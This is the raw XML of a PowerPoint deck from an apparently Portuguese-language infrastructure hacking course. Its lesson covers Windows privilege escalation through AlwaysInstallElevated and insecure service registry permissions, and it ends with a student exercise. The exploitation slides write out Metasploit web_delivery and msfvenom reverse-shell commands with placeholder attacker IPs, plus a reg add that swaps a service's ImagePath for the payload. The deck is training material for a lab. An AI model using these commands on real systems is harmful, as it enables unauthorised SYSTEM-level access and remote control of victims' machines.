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88" r:id="rId6"/>
  </p:sldMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="280" r:id="rId7"/>
    <p:sldId id="256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BF19B0-40E5-4A41-90FD-E566FB972CB9}" v="19" dt="2020-12-02T10:58:57.178"/>
    <p1510:client id="{E19C1099-F9F1-4729-AD51-CD841CAF9566}" v="1" dt="2020-11-30T14:25:46.875"/>
    <p1510:client id="{F0F030EF-7B44-4639-924C-7C20F029D620}" v="562" dt="2020-12-03T11:21:05.5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94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="81" d="100"/>
          <a:sy n="81" d="100"/>
        </p:scale>
        <p:origin x="97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li Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{76BF19B0-40E5-4A41-90FD-E566FB972CB9}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{76BF19B0-40E5-4A41-90FD-E566FB972CB9}" dt="2020-12-02T10:58:57.178" v="18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76BF19B0-40E5-4A41-90FD-E566FB972CB9}" dt="2020-12-02T10:54:31.969" v="16" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="945758525" sldId="271"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{76BF19B0-40E5-4A41-90FD-E566FB972CB9}" dt="2020-12-02T10:54:31.969" v="16" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="945758525" sldId="271"/>
            <ac:spMk id="13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F0F030EF-7B44-4639-924C-7C20F029D620}"/>
    <pc:docChg chg="addSld modSld">
      <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{F0F030EF-7B44-4639-924C-7C20F029D620}" dt="2020-12-03T11:21:04.552" v="555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F0F030EF-7B44-4639-924C-7C20F029D620}" dt="2020-12-03T11:00:37.909" v="18" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1986236096" sldId="278"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{F0F030EF-7B44-4639-924C-7C20F029D620}" dt="2020-12-03T11:00:37.909" v="18" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1986236096" sldId="278"/>
            <ac:spMk id="10" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{F0F030EF-7B44-4639-924C-7C20F029D620}" dt="2020-12-03T11:16:35.708" v="38" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1989399932" sldId="279"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{F0F030EF-7B44-4639-924C-7C20F029D620}" dt="2020-12-03T11:16:35.708" v="38" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1989399932" sldId="279"/>
            <ac:spMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new">
        <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{F0F030EF-7B44-4639-924C-7C20F029D620}" dt="2020-12-03T11:21:04.552" v="554" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4168870671" sldId="281"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{F0F030EF-7B44-4639-924C-7C20F029D620}" dt="2020-12-03T11:17:06.349" v="66" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4168870671" sldId="281"/>
            <ac:spMk id="2" creationId="{B20A604C-2693-411A-824E-2D57DE686D25}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{F0F030EF-7B44-4639-924C-7C20F029D620}" dt="2020-12-03T11:18:40.505" v="258" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4168870671" sldId="281"/>
            <ac:spMk id="3" creationId="{4BB196E1-FE9D-449D-BC9A-B5445D2609CB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{F0F030EF-7B44-4639-924C-7C20F029D620}" dt="2020-12-03T11:21:04.552" v="554" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4168870671" sldId="281"/>
            <ac:spMk id="4" creationId="{54D3620D-0782-42E9-A75F-3B61ECF80C77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E19C1099-F9F1-4729-AD51-CD841CAF9566}"/>
    <pc:docChg chg="delSld">
      <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{E19C1099-F9F1-4729-AD51-CD841CAF9566}" dt="2020-11-30T14:25:46.875" v="0"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="del">
        <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{E19C1099-F9F1-4729-AD51-CD841CAF9566}" dt="2020-11-30T14:25:46.875" v="0"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3304448953" sldId="2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025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1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652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190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2404412" y="4512734"/>
            <a:ext cx="68580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Curso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Hacking para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Infraestruturas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Tradu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ção: Luli Rosenberg &amp; Helton Wernik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55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659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969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560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866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748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40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פריסה מותאמת אישי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316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489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5652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7533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2878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4827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קורס פייתון בהייטק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Roman Zaikin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2366895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 sz="5333" b="1" u="sng" baseline="0">
                <a:latin typeface="Ariel"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" u="none" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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5367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altLang="ko-KR" sz="37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Widescreen 16:9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37889124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85496D-FCA5-44B8-848A-CAA9086B6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33D868B-FB4A-4D75-A090-1EAF6EA18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BB38010-536F-4FBF-9984-347C445E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7442F4-5EE5-4D82-AE1A-D683FE20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2F441D-ACEE-4E6B-869D-FD94FC56C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0917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AC0024-989E-49A4-B852-E022A4930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6866ADA-A87E-4A28-9B3B-270A4FFC6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1F5A1A-FA9F-4ECB-91D8-262B4156C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53F836-0EDF-4995-8726-6C2BEB3D1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43C91F-DAB9-4070-ABC4-378E41801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92484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AC4259-0416-4C58-AED2-C12BC60D3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232F038-B57A-43D7-83DE-4C1BDF6E8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0742C7-802E-40CA-92F1-8F3DE2762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D712564-DE48-4816-8154-AE53B0AE2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6ADE21-862D-4624-B998-5416F549D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5966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8264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85440A-F3D2-4053-B285-1486CE9D4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0E0665-0A87-4E2E-859F-BF89A550A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2A72208-CE47-436F-91DD-37C67221A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3CD3A68-BF12-44EF-9FE6-6C31EA3B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5FBA783-E71B-45C4-B70D-C85B71C66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E58A5F5-3EC8-4201-A17D-80D17FC7F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88804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D59CB1-1DF9-4BD9-BA17-5111DFCC9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6D5D21E-779F-4BEA-A401-F11983B40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F88A079-8456-43AE-A9FB-23BA4E842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0B64DA9-462D-4B08-9729-71C485E6B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728117E-CA06-415F-8DF0-AB5E67CADC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E4E4F4F-043E-43F7-B25D-736122CBD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732E3D5-D8C5-4BF3-800A-73962BEEC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B4818E6-EB4A-42B6-A30F-70EB5AEFF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5382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103DA1-0115-4873-A34C-9D8259FB9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8241D89-FC0E-4B5C-9187-314BAADA4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DFB1132-17DC-46B9-841F-4BAC35D0B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899C61A-B929-4627-B9D8-6173ECC2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67605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B3D6E0-EB45-4D17-84F8-33CCA7632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41705CD-66A7-4ABE-B035-9511426B6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D1FB053-92D3-4BB8-973C-92E37CCA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4436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11478F-1D15-4E29-8CD4-16169D6EC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CF61BE-E3B3-41B0-8051-A05A94D95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DB8C06-B96D-4FFD-B5F0-216A1044DD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33AF793-D3D0-44D5-A041-7355AF409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AE7EDB-CB80-444E-A6F0-B19F54381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4D066B-F933-4A93-A633-B0252187B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739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B40AA3-E25A-4495-AD9E-DDE181D0E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4C5A348-AD76-44CF-B978-084D4C27A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693FABE-0C35-4630-903B-E9A8F36C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5BAB326-C662-43DB-B6EC-8E3E0FA0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9F8CAF-E24F-48EB-8CDF-A07B355A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F45D77-4527-41F7-949D-37CD99F6A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81970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578C62-5708-4D0D-AB6B-F829F2681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890558F-533D-4392-AB22-BF3037F2C4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675E85-3C48-480F-9FA9-82AE21080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7F1AD2-F40C-4F0E-82E4-D7C48CB93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9F5F1C-D861-4613-B0A8-27B9B18F6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54897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EF0915-DB5A-4652-929A-F8505F4ED4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55BE996-6EC7-49E2-8D8A-A2309B8BF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8B5210-76CA-4AD3-894A-A50618A33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E6BD48D-4E2E-4478-8753-80A07487C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113DFA-67C5-47EA-B7F1-BCE8C11F9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6409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584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051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516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605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8101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37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free-powerpoint-templates-design.com/free-powerpoint-templates-design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17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rgbClr val="09091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hlinkClick r:id="rId15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</a:t>
            </a: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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="pt-B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hay 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637" y="5405415"/>
            <a:ext cx="1854364" cy="11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7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32DA8BE-1A5E-47ED-B023-42C466B8A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C4DE9A-420D-4C79-93BC-DE086246E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262A05-A000-4C81-BD20-69DADD89CA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7088B-6248-44FE-AD00-9EE7739395F7}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>03/12/2020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59FCA71-4F62-4CE9-9763-07CA56D24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FD75F9-43C7-405D-93C7-FA099354A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9BFF3-A894-41EF-AC99-E4285239409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734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:%20https:/download.sysinternals.com/files/AccessChk.zip" TargetMode="Externa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ownload.sysinternals.com/files/AccessChk.zip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561923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80" y="1"/>
            <a:ext cx="2219120" cy="131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1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57317"/>
            <a:ext cx="118882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 exploit/multi/script/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>web_delivery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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>web_delivery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)&gt; set target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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>web_delivery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)&gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 192.168.X.X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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>web_delivery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)&gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>srvport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 8081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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>web_delivery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)&gt;  set payload windows/meterpreter/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>web_delivery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)&gt; exploit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003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 – Exploitation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1729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Upgrading shell:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64944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57317"/>
            <a:ext cx="118882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AlwaysInstallElevated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>é uma configuração de política que instrui o Windows Installer a usar permissões elevadas ao instalar qualquer pacote no sistema.</a:t>
            </a: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Se esta configuração de política for habilitada, os privilégios serão estendidos a todos os programas.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Habilitar isso equivale a conceder direitos administrativos a usuários não privilegiados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AlwaysInstallElevated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6459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Quando um serviço é registrado no sistema, uma nova chave é criada no seguinte caminho de registro: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>HKEY_LOCAL_MACHINE\SYSTEM\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1"/>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>\services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17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Insecure Service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781161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Os serviços do Windows, na maioria das vezes, são executados com privilégios de SYSTEM.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404428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Todo serviço precisa ter a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>ACL (Lista de Controle de Acesso) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>que o protegerá de qualquer configuração incorreta. Em alguns casos, encontramos serviços que não são tão bem protegidos.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7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Sysinternals Suite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Accesschk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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137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Insecure Service - Enumeration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532470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 ferramenta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Accesschk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> é altamente recomendada para avaliar qualquer tipo de permissão com mais eficiência.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052680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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Accesschk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> não se limita às chaves de registro, mas também permite ao usuário visualizar as listas de acesso de diferentes objetos do Windows, como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>arquivos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>processos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>usuários</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>grupos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>serviços</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>.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849889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Retorna objetos aos quais um determinado usuário ou grupo pode ter acesso de gravação.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32495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i="1" dirty="0"/>
              <a:t>Você pode baixar o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" err="1"/>
              <a:t>Accesschk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0"/>
              <a:t> aqui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0">
                <a:hlinkClick r:id="rId2" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>: https://download.sysinternals.com/files/AccessChk.zip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0923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Install the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>PhotodexProShowGold.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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77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Insecure Service – Environment Setup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532470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Navegue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path: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HKEY_LOCAL_MACHINE\SYSTEM\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\services\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ScsiAccess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Clique com o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>botão</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>direito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pasta “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ScsiAccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> permissions  Add  Everyone  Full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09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Insecure Service – Exploitation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004942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Download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Accesschk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wget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https://download.sysinternals.com/files/AccessChk.zip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unzip AccessChk.zip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14501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with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Accesschk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accesschk.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>accepteula</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> "Everyone" -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kvuqsw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hklm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\System\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\services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00808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Query the registry key to find the image path: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reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> query "HKLM\System\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\Services\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ScsiAccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" /v "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ImagePath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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926474"/>
            <a:ext cx="118882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Create a new payload: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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shell_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> LHOST=192.168.x.xx LPORT=6666 -f exe -o run.exe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upload /root/run.exe "C:\\Users\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>IEUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AppData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\\Local\\run.exe"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623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09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Insecure Service – Exploitation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004942"/>
            <a:ext cx="118882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Edit the registry key with the new executable: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reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ScsiAccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" /t REG_EXPAND_SZ /v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ImagePath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /d "C:\Users\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>IEUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AppData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\Local\run.exe" /f</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"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14501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Restart remote host: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shutdown /r /t 0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198939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0A604C-2693-411A-824E-2D57DE686D25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="831774" y="418640"/>
            <a:ext cx="2743199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400" dirty="0" err="1"/>
              <a:t>Exercício</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0" err="1"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B196E1-FE9D-449D-BC9A-B5445D2609CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="791035" y="1663202"/>
            <a:ext cx="937167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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Sigam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> com o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>escalonamento</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>privilégios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Inscure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Service e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ganhem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>acesso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> com o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Enviem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> pela </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>plataforma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> um screenshot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D3620D-0782-42E9-A75F-3B61ECF80C77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731933" y="3458607"/>
            <a:ext cx="9426763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400" u="sng" dirty="0" err="1"/>
              <a:t>Bônus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" u="sng" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Busquem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
